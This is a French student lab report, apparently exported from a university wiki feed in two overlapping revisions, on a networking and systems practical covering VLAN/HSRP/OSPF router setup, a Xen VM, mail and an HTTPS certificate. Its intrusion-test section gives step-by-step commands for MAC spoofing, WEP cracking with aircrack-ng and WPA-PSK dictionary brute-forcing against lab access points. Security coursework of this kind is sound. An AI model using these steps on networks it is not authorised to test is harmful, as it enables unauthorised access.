init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23148</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23148"/>
				<updated>2015-11-23T15:21:29Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
